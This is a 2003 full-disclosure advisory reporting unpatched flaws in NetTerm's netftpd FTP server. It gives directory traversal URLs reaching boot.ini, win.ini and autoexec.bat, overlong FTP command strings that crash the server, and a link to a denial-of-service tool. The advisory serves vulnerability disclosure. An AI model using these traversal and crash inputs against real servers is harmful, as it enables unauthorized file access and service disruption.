- EXPL-A-2003-017 exploitlabs.com Advisory 017
-= netterm netftpd =-
netftpd.exe - integral to netterm - 4.2.8.e(i) [current] all versions through current are affected
"NetTerm is a Windows based terminal emulator with fast zmodem file transfers. It can also be used as a dialer program for SLIP/PPP and includes a built in scripting language. For Internet hosts, the telnet protocol is enabled with VT100 and full ANSI graphics. A ftp server is included. Transparent printing and local host editing is supported for UNIX. nt3242e.exe - 32 bit InterSoft@compuserve.com"
binary package - http://www.securenetterm.com/pub/nt3242ei.exe
mainpage - http://www.netterm.com more info - http://securenetterm.com/html/downloads.html
by default netftpd uses c:\ as its base ftproot
netftpd.exe started with defaults server: Windows XP Professional
----------- snip -------------
root@linuxbitch:/#ftp vunerable[host].com 220 NetTerm FTP server ready
ftp>ls ( or dir )
---------- snip --------------
remote ftpd server crashes
note: with logging and trace enabled in the options, netftpd does not log any commands when crashed
sample crash output..
error1: The instruction at "0x77f551c0" referenced memory at "0x00000000". the memory could not be "read" Click OK to terminate program error2: The instruction at "0x77f5310f" referenced memory at "0x656e776f" the memory could not be "written" Click OK to terminate program
these produce some odd behavior as well ( in a browser )
ftp://[host]/c:%5C/c:%5C/../../ ftp://[host]/c:%5C/../../././././././././ ftp://[host]/../boot.ini
DrInsane helped with these...
If you send any of these ftp server will crash:)Even the user command has problem.
Cwd [a] * 518 User [a] * 1110 List [a] * 518 Stu [a] * 518 Port [a] * 1110 Type [a] * 1110 Mkd [a] * 1110 Dele [a] * 1110 Rmd [a] * 1110
You can also try to give strings in you browser using HTML chars like: (just for fun) /%5c..%5c..%5c..%5cwindows%5cwin%2eini /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat
DrInsane also has writen a sample prog that will crash the ftp. (http://members.lycos.co.uk/r34ct/main/godzillaDosTool/).
No fix on 0day
Concurrent with this advisory firstname.lastname@example.org
Donnie Werner email@example.com http://exploitlabs.com
I would like to thank DrInsane and Nutcase for the input and help testing
Original advisory at http://exploitlabs.com/files/advisories/EXPL-A-2003-017-netftpd.txt
Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html